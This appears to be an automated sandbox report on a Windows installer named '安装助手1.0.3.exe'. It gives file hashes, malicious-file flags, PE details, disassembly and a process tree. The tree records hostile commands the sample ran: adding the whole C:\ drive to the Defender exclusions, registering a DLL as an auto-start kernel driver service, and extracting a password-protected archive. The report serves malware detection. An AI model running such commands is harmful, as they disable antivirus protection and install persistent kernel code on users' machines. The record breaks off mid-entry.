                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:true
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:true
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530564940970483
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:CC931C68EF6CB43932F2B21773072C73
                            SHA1:70E6A4F6482CC6006FF0F91A967FC5707B2F90C9
                            SHA-256:3707449B5CFF4A2360DA5BD55A06274C6F934B93BBEEFDF01956665DB3230AE0
                            SHA-512:924E79F925305B052B14D028EB26E9949F4188B293A35F6676BEED39D70CBF9CDBEE96F931FC44084CBB841416EDE807D465865EFCAA388D0C199573B32BEAA4
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530564940970483
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:CC931C68EF6CB43932F2B21773072C73
                            SHA1:70E6A4F6482CC6006FF0F91A967FC5707B2F90C9
                            SHA-256:3707449B5CFF4A2360DA5BD55A06274C6F934B93BBEEFDF01956665DB3230AE0
                            SHA-512:924E79F925305B052B14D028EB26E9949F4188B293A35F6676BEED39D70CBF9CDBEE96F931FC44084CBB841416EDE807D465865EFCAA388D0C199573B32BEAA4
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):406
                            Entropy (8bit):5.117520345541057
                            Encrypted:false
                            SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                            MD5:9200058492BCA8F9D88B4877F842C148
                            SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                            SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                            SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                            Malicious:false
                            Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.949167675813021
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 98.04%
                            • Inno Setup installer (109748/4) 1.08%
                            • InstallShield setup (43055/19) 0.42%
                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            File name:#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            File size:7'495'744 bytes
                            MD5:3dd1a269e502f7284674c54819e9ad8e
                            SHA1:f3764c08583b70e6427d8efe97e6daa1582de9a3
                            SHA256:9622e99ad30c7b5bef5ad85c34ea80a961f1d5d05dcc9a0083c3fa8a00966228
                            SHA512:392d4b57eadc20d7118954c3c9e44e80803cd0df05b9beecdab7219ba8a1826e0427748dec12b07c4179c444f526941399b606b79209393a08c16c1439256e05
                            SSDEEP:196608:l9Z1v6nEaCmoy2/qQAflhtvgG+Kay7DS2KI:lonELvy2/qRlhSG+Kx7DS2L
                            TLSH:C2762223F2CBD03EE05A1B3715B2A61494FB6A616523AD5296FCB4ECCF310601E3E657
                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                            Icon Hash:0c0c2d33ceec80aa
                            Entrypoint:0x4a83bc
                            Entrypoint Section:.itext
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:1
                            File Version Major:6
                            File Version Minor:1
                            Subsystem Version Major:6
                            Subsystem Version Minor:1
                            Import Hash:40ab50289f7ef5fae60801f88d4541fc
                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFA4h
                            push ebx
                            push esi
                            push edi
                            xor eax, eax
                            mov dword ptr [ebp-3Ch], eax
                            mov dword ptr [ebp-40h], eax
                            mov dword ptr [ebp-5Ch], eax
                            mov dword ptr [ebp-30h], eax
                            mov dword ptr [ebp-38h], eax
                            mov dword ptr [ebp-34h], eax
                            mov dword ptr [ebp-2Ch], eax
                            mov dword ptr [ebp-28h], eax
                            mov dword ptr [ebp-14h], eax
                            mov eax, 004A2EBCh
                            call 00007F2B4CE977C5h
                            xor eax, eax
                            push ebp
                            push 004A8AC1h
                            push dword ptr fs:[eax]
                            mov dword ptr fs:[eax], esp
                            xor edx, edx
                            push ebp
                            push 004A8A7Bh
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            mov eax, dword ptr [004B0634h]
                            call 00007F2B4CF2914Bh
                            call 00007F2B4CF28C9Eh
                            lea edx, dword ptr [ebp-14h]
                            xor eax, eax
                            call 00007F2B4CF23978h
                            mov edx, dword ptr [ebp-14h]
                            mov eax, 004B41F4h
                            call 00007F2B4CE91873h
                            push 00000002h
                            push 00000000h
                            push 00000001h
                            mov ecx, dword ptr [004B41F4h]
                            mov dl, 01h
                            mov eax, dword ptr [0049CD14h]
                            call 00007F2B4CF24CA3h
                            mov dword ptr [004B41F8h], eax
                            xor edx, edx
                            push ebp
                            push 004A8A27h
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            call 00007F2B4CF291D3h
                            mov dword ptr [004B4200h], eax
                            mov eax, dword ptr [004B4200h]
                            cmp dword ptr [eax+0Ch], 01h
                            jne 00007F2B4CF2FEBAh
                            mov eax, dword ptr [004B4200h]
                            mov edx, 00000028h
                            call 00007F2B4CF25598h
                            mov edx, dword ptr [004B4200h]
                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .rsrc | 0xcb000 | 0x11000 | 0x11000 | b2dcf14000a1dc7150e021c573503d26 | False | 0.1877154181985294 | data | 3.723301568529278 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                            RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                            RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
                            RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                            RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
                            RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                            RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                            RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                            RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                            RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                            RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                            RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                            RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                            RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                            RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
                            RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
                            RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
                            RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
                            RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
                            RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
                            RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
                            RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
                            RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
                            RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
                            RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
                            RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
                            RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
                            RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.2045454545454546
                            RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                            RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2769121813031161
                            RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                            DLL | Import
                            kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                            comctl32.dll | InitCommonControls
                            user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                            oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                            advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                            Name | Ordinal | Address
                            __dbk_fcall_wrapper | 2 | 0x40fc10
                            dbkFCallWrapperAddr | 1 | 0x4b063c
                            Language of compilation system | Country where language is spoken
                            English | United States
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Dec 24, 2024 05:03:04.641779900 CET | 1.1.1.1 | 192.168.2.6 | 0x8f69 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                            Dec 24, 2024 05:03:04.641779900 CET | 1.1.1.1 | 192.168.2.6 | 0x8f69 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                            Target ID:0
                            Start time:23:03:06
                            Start date:23/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
                            Imagebase:0x900000
                            File size:7'495'744 bytes
                            MD5 hash:3DD1A269E502F7284674C54819E9AD8E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:23:03:06
                            Start date:23/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$10438,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
                            Imagebase:0x820000
                            File size:3'366'912 bytes
                            MD5 hash:CC931C68EF6CB43932F2B21773072C73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:3
                            Start time:23:03:07
                            Start date:23/12/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                            Imagebase:0x7ff6e3d50000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:23:03:07
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:23:03:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff717f30000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:7
                            Start time:23:03:15
                            Start date:23/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
                            Imagebase:0x900000
                            File size:7'495'744 bytes
                            MD5 hash:3DD1A269E502F7284674C54819E9AD8E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:false

                            Target ID:8
                            Start time:23:03:15
                            Start date:23/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$30450,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
                            Imagebase:0x370000
                            File size:3'366'912 bytes
                            MD5 hash:CC931C68EF6CB43932F2B21773072C73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:9
                            Start time:23:03:17
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:23:03:17
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:11
                            Start time:23:03:17
                            Start date:23/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                            Imagebase:0x970000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            • Detection: 0%, Virustotal
                            Reputation:moderate
                            Has exited:true

                            Target ID:12
                            Start time:23:03:17
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:13
                            Start time:23:03:17
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:14
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
